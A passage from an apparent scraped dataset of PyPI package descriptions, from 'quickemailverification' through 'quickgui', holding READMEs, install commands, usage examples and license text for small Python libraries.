be found by http response header. It\ncontains overall remaining credits, including Persistent & Per day\ncredits.X-QEV-Remaining-Credits- Your remaining email verification\ncredits (i.e. 
Per Day Credits + Persistent Credits).HTTP status codes for QuickEmailVerification API callsQuickEmailVerification API also returns following HTTP status codes to\nindicate success or failure of request.200- Request is completed successfully.400- Server can not understand the request sent to it. This is\nkind of response can occur if parameters are passed wrongly.401- Server can not verify your authentication to use api.\nPlease check whether API key is proper or not.402- You are running out of your credit limit.404- Requested API can not be found on server.429- Too many requests. Rate limit exceeded.Sandbox ModeQuickEmailVerification single email verification API sandbox mode helps developers to test their integration against simulated results. Requesting against sandbox endpoint is totally free and no credits will be deducted from actual credit quota.Please refer ourknowledge baseto learn more about sandbox mode.LicenseMITBug ReportsReporthere.Need Help? Feel free to contact ushttps://quickemailverification.com/contact-us"} +{"package": "quickemcee", "pacakge-description": "quickemceeA Python library to quickly set up MCMC scripts based on theemceepackage. Includes functions and classes to quickly set upemceeobjects, run MCMC, and analyze the results with minumum effort from the end user.Github pagesVisit quickemcee's Github pages onhttps://sofia-scz.github.io/quickemcee/. There you can find documentation, worked examples, and other information.Installationpip install quickemceeReferencing this workRecommended BibTex citation@software{quickemcee,\n author = {Scozziero, Sofia Anna},\n title = {quickemcee: simple prebuilt MCMC scripts},\n month = jul,\n year = 2022,\n publisher = {Zenodo},\n doi = {10.5281/zenodo.6857842},\n url = {https://doi.org/10.5281/zenodo.6857842}\n}"} +{"package": "quicken", "pacakge-description": "quickenMake Python tools fast.# app/cli.pyimportslow_moduleimporthas_lots_of_dependenciesdefcli():print('hello world')# Finally get to work after everything is loaded.slow_module.do_work(has_lots_of_dependencies)# app/main.pyfromquickenimportcli_factory@cli_factory('app')defmain():from.cliimportclireturncliThat's it! The first timemain()is invoked a server will be created and\nstay up even after the process finishes. When another process starts up it\nwill request the server to executecliinstead of reloading all modules\n(and dependencies) from disk. This relies on the speed offorkbeing lower\nthan the startup time of a typical cli application.Ifpython -c ''takes 10ms, this module takes around 40ms. That's how\nfast your command-line apps can start every time after the server is up.WhyPython command-line tools are slow. We can reduce dependencies, do lazy\nimporting, and do little/no work at the module level but these can only go\nso far.Our goal is to speed up the cli without giving up any dependencies. Every Python\nCLI tool should be able to get to work in less than 100ms.GoalsBe as fast as possible when invoked as a client, be pretty fast when invoked\nand we need to start a server.LimitationsUnix only.Debugging may be less obvious for end users or contributors.Daemon will not automatically have updated gid list if user was modified.Access to the socket file implies access to the daemon (and the associated command that it would run if asked).TipsProfile import time with -X importtime, see if your startup is actually the\nproblem. If it's not then this package will not help you.Distribute your package as a wheel. 
When wheels are installed they create\nscripts that do not importpkg_resources, which can save 60ms+ depending\non disk speed and caching.Developmentln -sf ../.githooks .git/hooks"} +{"package": "quick-encrypt", "pacakge-description": ""} +{"package": "quicker", "pacakge-description": "quickerInstallationpipinstallquicker"} +{"package": "quickerDebug", "pacakge-description": "Welcome to quickerDebug!QuickerDebug offers a standardized alternative toprint(\"here\")andprint(my_var)with simple, quick, and efficient logging functions that provide information without the need to repeat yourself. Generally, the best use case is for small scale applications or test code, where a complete debugger is overkill, butprint(\"here\")can get overly tedious to repeatedly type. Function names are purposefully shortened avoid writing out long function calls, so you don't waste time while debugging.Note that quickerDebug is optimized for terminals supported colors (throughtermcolor), meaning it may not work on all CLIs.Installation>> pip install quickerDebugQuick StartInitializationTo use the package, you need to create an instance ofQuickerDebug, from which methods can be called.fromquickerDebugimportquickerDebugqd=quickerDebug.QuickerDebug()Basic LoggingThe two essential functions for logging areqd.p()andqd.v().# Logs index, line number, timestamp, and a optional messageqd.p()# qd.p() also supports positional arguments for extra functionality like so:qd.p(status=\"DEBUG\",msg=\"\",color=None,showFullPath=False,**kwargs)# ieqd.p(\"INFO\",\"First Test\",\"blue\",True)# Logs all variables with thier current valuesqd.v()# Variables are displayed inlineqd.v(inline=True)AutoVar ConfigsAutoVar configs allow you to set up a list of varibles with a certain format to be printed with current values with theqd.vc()function, and then allows you to access that printing configuration withqd.v(config_key).a=1b=2# Create a config that prints the variables a and b, where the config_key is 1qd.vc(1,\"a\",\"b\")# Would print just a & bqd.v(1)# config_key is the first argumentVariable TrackingquickerDebugalso provides lightweight, real-time variable tracking in the terminal throughqd.track()andqd.rt()a=1# Would print the value of a every 10ms for 5sqd.track(\"a\",10,5)# Would clear the terminal after each printqd.track(\"a\",10,5,autoclear=True)# Preset Function for indefinite real-time trackingqd.rt(\"a\")Additional Keyword ArgumentsAll quickerDebug functions can take certain keyword arguments, as shown below:FunctionKwargsqd.p()status : strqd.p() & qd.v()showFullPath : boolqd.p() & qd.v()color : str (from colors in termcolor)qd.p()msg : strqd.v()inline : boolqd.track() & qd.rt()autoclear : boolKwargPossible Valuesstatus\"OFF\", \"O\", \"ERROR\", \"ERR\", \"E\", \"WARNING\", \"WARN\", \"W\", \"DEBUG\", \"D\", \"INFO\", \"I\", \"TRACE\", \"T\"color\"grey\", \"red\", \"green\", \"yellow\", \"blue\", \"magenta\", \"cyan\", \"white\""} +{"package": "quickerml", "pacakge-description": "quickermlMachine learning module intended to be your first shot swiss knife.If you work on Data Science or Artificial Intelligence projects you probably have had to repeat over and over again the same crucial first steps on your project in order to find what's the best model option for your data.There is the idea that gave birth toquickerml: Automatize those repetitive initial tests to find the best starting model for your project.Installationpip install quickermlGet startedfrom quickerml import Finder\n\nfinder = Finder(\n 
problem_type='regression', \n models=[\n LinearSVR(), \n RandomForestRegressor(), \n XGBRegressor(), \n LGBMRegressor()\n ]\n)\n\nbest = finder.find(X, y)"} +{"package": "quickest", "pacakge-description": "Install$ pip install quickestQuickstartGet a config file:$ quickest getconfRun a simulation and save the result locally:$ quickest simulate --conf [CONFIG].jsonView a result from a folder:$ quickest view --loc [FOLDER]See more options:$ quickest -h"} +{"package": "quickey-python-sdk", "pacakge-description": "QuickeySDK - PythonA Login Management System for ApplicationHow to Usefrom quickey_python_sdk import QuickeySDK\n\nsdk = QuickeySDK('YOUR API KEY')Get App Metadatadata = sdk.app.getAppMetaData()\nappId = data.json()['app']['_id']Send SMS OTPinput = {'phone':'YOUR PHONE NUMBER', 'provider':'YOUR PROVIDER'}\ncustomerData = sdk.app.sendSMSOTP(**input)Get Access Token By Emailinput = {'email':'YOUR USER EMAIL', 'provider':'YOUR PROVIDER'}\ntoken = sdk.auth.getAccessTokenByEmail(**input)Get Access Token By Phoneinput = {'phone':'YOUR PHONE NUMBER', 'provider':'YOUR PROVIDER', 'otpCode':'YOUR OTP CODE'}\ntoken = sdk.auth.getAccessTokenByPhone(**input)Link Phone To Emailinput = {'phone':'YOUR PHONE NUMBER', 'token':'YOUR ACCESS TOKEN LOGIN FROM EMAIL'}\ncustomerdata = sdk.auth.linkPhoneToEmail(**input)"} +{"package": "quickf", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickfiles", "pacakge-description": "UNKNOWN"} +{"package": "quickfind", "pacakge-description": "UNKNOWN"} +{"package": "quickfire", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix", "pacakge-description": "Copyright (c) 2001-2018 Oren MillerRedistribution and use in source and binary forms, with or withoutmodification, are permitted provided that the following conditionsare met:1. Redistributions of source code must retain the above copyrightnotice, this list of conditions and the following disclaimer.2. Redistributions in binary form must reproduce the above copyrightnotice, this list of conditions and the following disclaimer inthe documentation and/or other materials provided with thedistribution.3. The end-user documentation included with the redistribution,if any, must include the following acknowledgment:\"This product includes software developed byquickfixengine.org (http://www.quickfixengine.org/).\"Alternately, this acknowledgment may appear in the software itself,if and wherever such third-party acknowledgments normally appear.4. The names \"QuickFIX\" and \"quickfixengine.org\" mustnot be used to endorse or promote products derived from thissoftware without prior written permission. For writtenpermission, please contact ask@quickfixengine.org5. Products derived from this software may not be called \"QuickFIX\",nor may \"QuickFIX\" appear in their name, without prior writtenpermission of quickfixengine.orgTHIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIEDWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIESOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE AREDISCLAIMED. 
IN NO EVENT SHALL QUICKFIXENGINE.ORG ORITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOTLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OFUSE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED ANDON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUTOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OFSUCH DAMAGE.Download-URL: http://www.quickfixengine.orgDescription: UNKNOWNPlatform: UNKNOWN"} +{"package": "quickfix2", "pacakge-description": "Quickfix2descriptionThis Python package is the same as the original QuickFIX package,except that it is compiled binaries for Linux and macOS.source code:https://github.com/tangjicheng46/quickfix2original source code:https://github.com/quickfix/quickfixbuildpip install -U setuptools wheel twine\n\npython setup.py bdist_wheel --plat-name=manylinux1_x86_64"} +{"package": "quickfix-albert", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-arm", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickfix-arm64", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-binary", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-ch", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-M1", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-postgres", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-ssl", "pacakge-description": "This package is a fork of the Quickfix project that exposes the\nSSL capabilities of the library to Python. The pull request can\nbe foundhere.Differences to the officialquickfixpackage are:The SSLSocketInitiator and SSLSocketAcceptor are now available.UtcTimeStamp, UtcDate and UtcTimeOnly are now exposed.A getDateTime() method is added to UtcTimeStamp which will return\na python datetime.A setFromString() method is added to SessionSettingsLicense requirementsThe QuickFIX Software License, Version 1.0Copyright (c) 2001-2018 Oren MillerRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions\nare met:Redistributions of source code must retain the above copyright\nnotice, this list of conditions and the following disclaimer.Redistributions in binary form must reproduce the above copyright\nnotice, this list of conditions and the following disclaimer in\nthe documentation and/or other materials provided with the\ndistribution.The end-user documentation included with the redistribution,\nif any, must include the following acknowledgment:\n\"This product includes software developed by\nquickfixengine.org (http://www.quickfixengine.org/).\"\nAlternately, this acknowledgment may appear in the software itself,\nif and wherever such third-party acknowledgments normally appear.The names \"QuickFIX\" and \"quickfixengine.org\" must\nnot be used to endorse or promote products derived from this\nsoftware without prior written permission. 
For written\npermission, please contactask@quickfixengine.orgProducts derived from this software may not be called \"QuickFIX\",\nnor may \"QuickFIX\" appear in their name, without prior written\npermission of quickfixengine.orgTHIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL QUICKFIXENGINE.ORG OR\nITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF\nUSE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGE."} +{"package": "quickfix-ssl-2", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-ssl-3", "pacakge-description": "No description available on PyPI."} +{"package": "quick-flask-server", "pacakge-description": "Quick Flask ServerA simple way to acess your Flask apps on the internet while running it on localhost.CompatabilityPython 3.6+ is required.Installationpipinstallquick-flask-serverQuickstartImport withfrom quick_flask_server import run_with_ngrokAddrun_with_ngrok(app)to make your Flask app available upon running# example.pyfromflaskimportFlaskfromquick_flask_serverimportrun_with_ngrokapp=Flask(__name__)run_with_ngrok(app)# Start ngrok when app is run@app.route(\"/\")defhello():return\"Hello World!\"if__name__=='__main__':app.run()Running the example:pythonquick_flask_server/example.py*Runningonhttp://127.0.0.1:5000/(PressCTRL+Ctoquit)*Runningonhttp://.ngrok.io*Trafficstatsavailableonhttp://127.0.0.1:4040You might also see this,You can copy the ngrok URL also from here.As shown in the above image ngrok has a web-interface which can be accessed at localhost:4040Here is a sample image of the web interface,"} +{"package": "quickflow", "pacakge-description": "No description available on PyPI."} +{"package": "quickforex", "pacakge-description": "quickforexQuick and easy access to foreign exchange rates. 
By default, this API usesexchangerate.hostas backend.Getting startedUsingquickforexfrom a Python scriptGet the last available rate for a single currency pairfromquickforeximportCurrencyPairimportquickforexquickforex.get_latest_rate(\"EUR/USD\")# -> Decimal(1.16)quickforex.get_latest_rate(\"EURUSD\")quickforex.get_latest_rate(\"EUR\",\"USD\")quickforex.get_latest_rate((\"EUR\",\"USD\"))quickforex.get_latest_rate(CurrencyPair(\"EUR\",\"USD\"))Get the last available rate for multiple currency pairsfromquickforeximportCurrencyPairimportquickforexquickforex.get_latest_rate(\"EUR/USD\",\"EUR/GBP\")# -> {CurrencyPair(\"EUR\", \"USD\"): Decimal(1.16), CurrencyPair(\"EUR\", \"GBP\"): Decimal(0.84)}quickforex.get_latest_rate([\"EUR/USD\",\"EUR/GBP\"])Get the historical rate for one or more currency pairsfromdatetimeimportdatefromquickforeximportCurrencyPairimportquickforexquickforex.get_historical_rate(\"BTC/USD\",as_of=date(year=2021,month=1,day=1))# -> Decimal(29388.20)quickforex.get_historical_rates(\"EUR/USD\",\"EUR/GBP\",as_of=date(year=2021,month=1,day=1))# -> {CurrencyPair(\"EUR\", \"USD\"): Decimal(1.21), CurrencyPair(\"EUR\", \"GBP\"): Decimal(0.89)}Get the rates for one or more currency pairs between two historical datesfromdatetimeimportdatefromquickforeximportCurrencyPairimportquickforexquickforex.get_rates_time_series(\"EURUSD\",\"EURGBP\",start_date=date(year=2020,month=1,day=1),end_date=date(year=2021,month=1,day=1))# -> {# CurrencyPair(\"EUR\", \"USD\"): {# date(year=2020, month=1, day=1): Decimal(1.12),# ...,# date(year=2021, month=1, day=1): Decimal(1.21)# },# CurrencyPair(\"EUR\", \"GBP\"): { ... }# }Usingquickforexfrom the command lineGet the last available rate for one or more currency pairs\u276fquickforexlatestEURUSDEURGBP{\"EUR\":{\"GBP\":0.846354,\"USD\":1.164798}}Get the historical rate for one or more currency pairs\u276fquickforexhistory--date2020-01-01EURUSDEURGBP{\"EUR\":{\"GBP\":0.8462,\"USD\":1.1221}}Get the rates for one or more currency pairs between two historical dates\u276fquickforexseries--from2020-01-01--to2020-12-31EURGBPEURUSDGBPJPY{\"EUR\":{\"GBP\":{\"2020-01-01\":0.8462,\"2020-01-02\":0.8466,\"2020-01-03\":0.8495,...\"2020-12-30\":0.903111,\"2020-12-31\":0.892135},\"USD\":{...}},\"GBP\":{\"JPY\":{...}}}"} +{"package": "quick_framework", "pacakge-description": "IntroductionNotice: this project is not suitable for public use yet. But it will soon, please stay tuned.\nQuick Framework is a Python web framework which enable you to develop a web site in minutes.Featuresquick: you could develop a blog or bbs system in minutes using quick framework. No other frameworks could be so quick."} +{"package": "quickfs", "pacakge-description": "QuickFS API SDKContentsGeneral descriptionRequirementsInstallationDemoDocumentationCompaniesMetricsDatapointsUsage historyDisclaimerGeneral description:arrow_up:This library is the Python :snake: unofficial SDK for the QuickFS REST API. It's intended to be used for data extraction for financial valuations.Requirements:arrow_up:You need to request an API key with the QuickFS team. Create your account in the followinglinkPython>= 3.8Installation:arrow_up:pipinstallquickfsDemo:arrow_up:The endpoints of the API will let you request fundamental data for your financial valuation. 
Here is a demo of its use:fromquickfsimportQuickFSimportos# load the key from the enviroment variablesapi_key=os.environ['API_QUICKFS']client=QuickFS(api_key)# Request reference data for the supported companiesresp=client.get_api_metadata()resp=client.get_supported_companies(country='US',exchange='NYSE')resp=client.get_updated_companies(country='US',date='20210420')# Available metrics in the APIresp=client.get_available_metrics()# Request fundamental data for each companyresp=client.get_data_range(symbol='AAPL:US',metric='shares_eop',period='FQ-15:FQ')resp=client.get_data_full(symbol='AAPL:US')resp=client.get_data_batch(companies=['KO:US','PEP:US'],metrics=['roa','roic'],period=\"FY-2:FY\")# Usage historyresp=client.get_usage()tutorial on how to save and load environment variables in Python ->Hiding Passwords and Secret Keys in Environment Variables (Windows)Documentation:arrow_up:All the methods will use the following instance of the general class:fromquickfsimportQuickFSimportos# load the key from the enviroment variablesapi_key=os.environ['API_QUICKFS']# client instanceclient=QuickFS(api_key)Companies:arrow_up:get_api_metadata: Returns the available countries and exchanges where to get data.arguments:*Noneusage:# get the metadata for the countries and exchanges.client.get_api_metadata()get_supported_companies: Returns a list of ticker symbols supported by QuickFS. You need to specify a country code (US, CA, MM, AU, NZ, MN, or LN). It is recommendable to use theget_api_metadatato get the references for each argument.arguments:country(str): quickfs code of the country to request data.exchange(str): quickfs code of the exchange to request data.usage:# get the companies for the NYSE exchangeNYSE=client.get_supported_companies(country='US',exchange='NYSE')# get the companies for the LSELSE=client.get_supported_companies(country='LN',exchange='LONDON')# get the companies from AustraliaASX=resp=client.get_supported_companies(country='AU',exchange='ASX')get_updated_companies: Returns a list of ticker symbols that were updated with new financial data on or after the specified date (formatted as YYYYMMDD). You need to specify a country code (US, CA, MM, AU, NZ, MN, or LN).arguments:country(str): quickfs code of the country to request data.date(str): specific date to request data, it should be written in the following format YYYYMMDD. Please be aware that may be a delay in the company update and the actual update in the quickfs database.usage# get the updated companies from New Zelandclient.get_updated_companies(country='NZ',date='20210420')Metrics:arrow_up:get_available_metrics: Returns a list of available metrics with the associated metadata.arguments:Noneusage:# get the supported metrics by quickfsclient.get_available_metrics()Datapoints:arrow_up:It is highly recommendable to use the country identifier code for non-U.S. stocks. If you do not specify a country, the API will first try to match a U.S.-listed symbol and, if none is found, will then match with a non-U.S. company with the same symbol. The order of the returned data is from oldest to more recent data.Additionally, the period or period range to query should have the following structureperiodorfrom:torespectively. For example, revenue is reported quarterly and annually, as determined by a company's fiscal calendar.FY-9:FYrepresents the last 10 years of annual revenue figures. 
Similarly, the last 20 quarters of reported quarterly revenue is characterised by the periodsFQ-19:FQ.get_data_range: Returns range of data points for a single company metric.arguments:symbol(str): company symbol. for example: AAPL:USmetric(str): QuickFS metric name.usage:# get the shares outstanding (shares that have been authorized, issued, and purchased by investors and are held by them).client.get_data_range(symbol='AAPL:US',metric='shares_eop',period='FQ-15:FQ')get_data_full: Pull metadata and all financial statements (annual and quarterly) for all periods for a single stock in one API call.arguments:symbol(str): company symbol. for example: AAPL:USusage:# get the full data for finnCap Group plcclient.get_data_full(symbol='FCAP:LN')get_data_batch: Batch request for several companies retrieving multiple metrics.arguments:companies(List[str]): List of companies to query.metrics(List[str]): List of metrics to query.period(str): Period or period range to query.usage:# Get the last 3 years of ROA and ROIC for Cocacola and Pepsiclient.get_data_batch(companies=['KO:US','PEP:US'],metrics=['roa','roic'],period=\"FY-2:FY\")Usage history:arrow_up:get_usage: Returns your current API usage and limits.arguments:Noneusage:client.get_usage()Disclaimer:arrow_up:The information in this document is for informational and educational purposes only. Nothing in this document may be construed as financial, legal or tax advice. The content of this document is solely the opinion of the author, who is not a licensed financial advisor or registered investment advisor. The author is not affiliated as a promoter of QuickFS services.This document is not an offer to buy or sell financial instruments. Never invest more than you can afford to lose. You should consult a registered professional advisor before making any investment."} +{"package": "quick-fuoss", "pacakge-description": "quick-fuossrapid estimation of ion-pair dissociation constantsDescriptionquick-fuossis an open-source Python 3 program designed to allow for quick estimation of ion-pair dissociation constants.\nTo run,quick-fuossrequires only the name of the cation and anion and the dielectric constant of the solvent in question.\nAlternatively,.xyzfiles can be supplied.quick-fuossrequires a working installation ofcctk, which does most of the heavy lifting.TheoryAs the name implies,quick-fuossuses the Fuoss model for modelling association/dissociation of idealized spherical ions in implicit solvent.1This approach is purely Coulombic and neglects any specific ion/ion interactions, as well as inner-sphere solvent effects (e.g. solvent coordination to transition metals).\nNevertheless, these approximations are reasonably satisfied for many common ion pairs.This model has been used to correct pKa values in relatively non-polar solvents: the present implementation is based on that literature.2,3Please note that the current implementation ofquick-fuossonly supports singly charged ions!Usagequick-fuosscan be used starting from either the names of the ions in question (requires Internet access) or.xyzfiles. 
Some examples are shown below:# Kd for sodium chloride in a solvent with dielectric constant 40\n$ python quick_fuoss.py sodium chloride 40\n\n# the same, but at -78 \u00baC\n$ python quick_fuoss.py --temp 195 sodium chloride 40\n\n# Kd of the chloride salt of cation.xyz in a solvent with dielectric constant 80\n$ python quick_fuoss.py cation.xyz chloride 80\n\n# Kd of the salt formed by combining cation.xyz and anion.xyz in a solvent with dielectric constant 12\n$ python quick_fuoss.py cation.xyz anion.xyz 12TestingThe calculated values are in reasonable agreement with reported values,4as seen below:$ python quick_fuoss.py tetraisoamylammonium nitrate 8.5\nReading ion #1 from rdkit...\nReading ion #2 from rdkit...\nDissociation constant:\t0.00004930 M\nIonization energy: 5.873 kcal/mol\n$ python quick_fuoss.py tetraisoamylammonium nitrate 11.9\nReading ion #1 from rdkit...\nReading ion #2 from rdkit...\nDissociation constant:\t0.00094706 M\nIonization energy: 4.122 kcal/molTo test that the program is working correctly, simply run:$ python test.py\nAll tests successful! (9 tests run in 14.91 seconds)ReferencesFuoss, R. M. Ionic Association III: The Equilibrium between Ion Pairs and Free Ions.J. Am. Chem. Soc.1958,80, 5059.Abdur-Rashid, K. et al. An Acidity Scale for Phosphorus-Containing Compounds Including Metal Hydrides and Dihydrogen Complexes in THF: Toward the Unification of Acidity Scales.J. Am. Chem. Soc.2000,122, 9155.Paenurk, E. et al. A unified view to Br\u00f8nsted acidity scales: do we need solvated protons?Chem. Sci.2017,8, 6964.Fuoss, R. M; Kraus, C. A. Properties of Electrolytic Solutions. III. The Dissociation Constant.J. Am. Chem. Soc.1933,55, 1019.Authors:quick-fuosswas written by Corin Wagen (Harvard University). Please emailcwagen@g.harvard.eduwith any questions or bug reports.How to Cite:Wagen, C.C.quick-fuoss2020,www.github.com/corinwagen/quick-fuoss.License:This project is licensed under the Apache License, Version 2.0. Please seeLICENSEfor full terms and conditions.Copyright 2020 by Corin Wagen"} +{"package": "quickgen", "pacakge-description": "No description available on PyPI."} +{"package": "quickgist", "pacakge-description": "UNKNOWN"} +{"package": "quickgpt", "pacakge-description": "example of quickgpt commandquickGPTis a lightweight and easy-to-use Python library that\nprovides a simplified interface for working with the new API interface\nof OpenAI\u2019s ChatGPT. With quickGPT, you can easily generate natural\nlanguage responses to prompts and questions using state-of-the-art\nlanguage models trained by OpenAI.For the record, this README was (mostly) generated with ChatGPT - hence\nthe braggy tone.Like fine wine and cheddar, this library pairs nicely with theElevenLabstext-to-speech\nAPI library.InstallationYou can installquickGPTusing pip:pipinstallquickgptUsageTo use quickgpt, you\u2019ll need an OpenAI API key, which you can obtain\nfrom the OpenAI website. Once you have your API key, you can specify\nyour API key using an environment variable:export OPENAI_API_KEY=\"YOUR_API_KEY_HERE\"or by passing it to theapi_keyparameter ofQuickGPT:chat = QuickGPT(api_key=\"YOUR_API_KEY_HERE\")See the examples for more information on how it works. Or, you can use\nthequickgpttool for an interactive ChatGPT session in your command\nline. 
Make sure~/.local/bin/is in your$PATH.usage: quickgpt [-h] [-k API_KEY] [-t THREAD] [-p PROMPT] [-l] [-n] [-i] [-v]\n\nInteractive command line tool to access ChatGPT\n\noptions:\n -h, --help show this help message and exit\n -k API_KEY, --api-key API_KEY\n Specify an API key to use with OpenAI\n -t THREAD, --thread THREAD\n Recall a previous conversation, or start a new one\n with the provided identifer\n -p PROMPT, --prompt PROMPT\n Specify the initial prompt\n -l, --list Lists saved threads\n -n, --no-initial-prompt\n Disables the initial prompt, and uses the User's first\n input as the prompt\n -i, --stdin Takes a single prompt from stdin, and returns the\n output via stdout\n -v, --version Returns the version of the QuickGPT library (and this\n command)DocumentationThere\u2019s no documentation yet. Stay tuned.ContributingIf you find a bug or have an idea for a new feature, please submit an\nissue on the GitHub repository. Pull requests are also welcome!LicenseThis project is licensed under the MIT License."} +{"package": "quick-gr", "pacakge-description": "make api doc quickly by python script"} +{"package": "quickgraph", "pacakge-description": "IntroductionQuickGraph library can help you get a quick overview of a social graph in an extremely convenient way. QuickGraph will show the basic information of a graph, plot the CDF of selected metrics, characterize the largest connected component (LCC).OverviewQuickGraph library can help you get a quick overview of a social graph in an extremely convenient way.\nShow the basic information of a graph, plot the CDF of selected metrics, characterize the largest connected component (LCC), compute representative structural hole related indexes.Copyright (C) <2021-2026> by Qingyuan Gong, Fudan University (gongqingyuan@fudan.edu.cn)Before InstallationPlease upgrade to Python 3.5System RequirementsWe have tested QuickGraph on both MacOSX (version 11.5.1) and Ubuntu (Version: 20.04 LTS). 
This library have not been tested on other platforms.UsagePlease run the following commond and install the dependent libiraires:Runconda config --add channels conda-forgeconda update \u2013allto make the libraries fit to the operation systemRunpip install python-igraphto install the iGraph libraryRunpip install leidenalgto help the modularity related analysisNote: Please change topip3 installif you are using Apple M1 ChipFunctionsquickgraph.info(G) returns the the basic information of a graph and plots the CDF of selected metrics.quickgraph.LCC_analysis(G) characterizes the largest connected component (LCC) of the input graph G on selected metrics.ExampleWe utilize the SCHOLAT Social Network dataset as one example.https://www.scholat.com/research/opendata/#social_network>>>importquickgraph>>>quickgraph.demo()NumberofNodes:16007,NumberofEdges:202248Avg.degree:25.2699,Avg.clusteringcoefficient:0.5486Modularity(Leidenalg):0.8651,Modularity(Label_Propagation):0.8372Numberofconnectedcomponents:5423,NumberofnodesinLCC:9583(59.8676%)Time(G_info):4.675LCC:Avg.degree=40.023,Avg.clusteringcoefficient=0.625,Modularity(Leidenalg):0.8551,Modularity(Label_Propagation):0.8209(rough)shortestpathlength=1:1(0.1%),2:26(2.6%),3:98(9.8%),4:162(16.2%),5:133(13.3%),6:65(6.5%),7:12(1.2%),8:3(0.3%),Avg.shortestpathlength=4.316Time(LCC):1.907LicenseSee the LICENSE file for license rights and limitations (MIT)."} +{"package": "quickgui", "pacakge-description": "Rapidly create GUI without any knowledge of wxpython=============================================jerryzhujian9_at_gmail.comTested under python 2.7To see your python versionin terminal: python -Vor in python: import sys; print (sys.version)inspired by gui2py, easygui=============================================Install:1) Requires wxPython 2.9.2.4 (tested under canopy)2) or you can install it first manually fromhttp://sourceforge.net/projects/wxpython/files/wxPython/2.9.2.4/Then https://pypi.python.org/pypi/quickguipip install quickguimethod 1&2 run: python myscript.py is fine3) For anacoda python (wxPython 3.0 tested)but remember to run: pythonw myscript.py instead of python myscript.pyUsage:import quickgui as qMessage(msg, seconds=10), messageDisplays a timed modal message box, timeout and cancel returns 0, ok returns 1XPrinter()Display a window to capture print outputif on, both terminal and window (updating gui will greatly increase script execution time)if off, only terminalMethods: on/offExamples:xprinter = XPrinter()xprinter.on()print 'will be shown on window'xprinter.off()print 'will be shown in terminal'xprinter.on()print 'on window again'for x in range(100):print \"I am a line of \" + str(x)# time.sleep(0.01)alert, confirm, getfile, setfile, getdir, inputsAlert(message, title=\"\", icon=\"exclamation\")# Shows a simple pop-up modal dialog.# icon = \"exclamation\", \"error\", \"question\", \"info\"Confirm(message=\"\", title=\"\", default=False, ok=False, cancel=False)# Asks for confirmation (yes/no or ok and cancel), returns True or False or None.# show yes/no by default# default sets the default button# ok shows OK; cancel shows CancelGetFile(directory='', filename='', multiple=False, wildcard='All Files (*.*)|*.*', title=\"Select file(s)\")# Shows a dialog to select files to open, return path(s) if accepted.# wildcard format: 'BMP files (*.bmp)|*.bmp|GIF files (*.gif)|*.gif''Pictures (*.jpeg,*.png)|*.jpeg;*.pngSetFile(directory='', filename='', overwrite=False, wildcard='All Files (*.*)|*.*', title=\"Save\"):# Shows a dialog to select file to save, 
return path(s) if accepted.# overwrite seems not work?GetDir(path=\"\", title='Select a directory')# Shows a dialog to choose a directory.values = Inputs(items=[], width=None, instruction='Click the button to read the help.', title='Ask for inputs')# Flexible dialog for user inputs.# Returns a value for each row in a list, e.g. [u'1001', u'female', u'', []]# textbox accepts a string or str(default) and returns a string or eval(string)# checkbox returns a bool# radiobox returns a string or ''# combobox returns a string or ''# listbox returns a list of strings or []# If cancels, returns Noneitems = [('ID:', ''),('ID:', 'siu8505'),('ID:', 1001),('IDs:', [1001, 1002]), ->textbox (internally converts data types)the first element is the labelthe second is the default value (e.g. an empty string, number or a list)('Logical Switch:', 'Checked?', False), ->checkBox (True/False)('Gender:', ['Female', 'Male'], 0), ->radiobox (0,1; -1 does not work)('Race:', ['Black', 'White', 'Other'], -1), ->combobox (-1 selects none)('Majors:(Can select more than one)',('Psychology','Math','Biology'), 0), ->listbox (multiple)the first is the labelthe second is the options:a string makes it a checkboxa list with two elements makes a radioboxa list with more than two elements makes a comboboxa tuple makes a listbox with multiple choice enabledthe third is the default value (True/False, index of the list or tuple)(''), ->blank linejust an empty string({'Selecte Input Directory...': \"GetDir()\"},''),({'Selecte Output Directory...': \"GetDir()\"},''),({'Save as...': \"SetFile()\"},''), ->button({'Selecte Files...': \"GetFile(multiple=True)\"},[]),->listbox (disabled)({\"Output File Name(*.csv):\": \"SetFile(directory='%s', filename='output.csv', wildcard='CSV Files 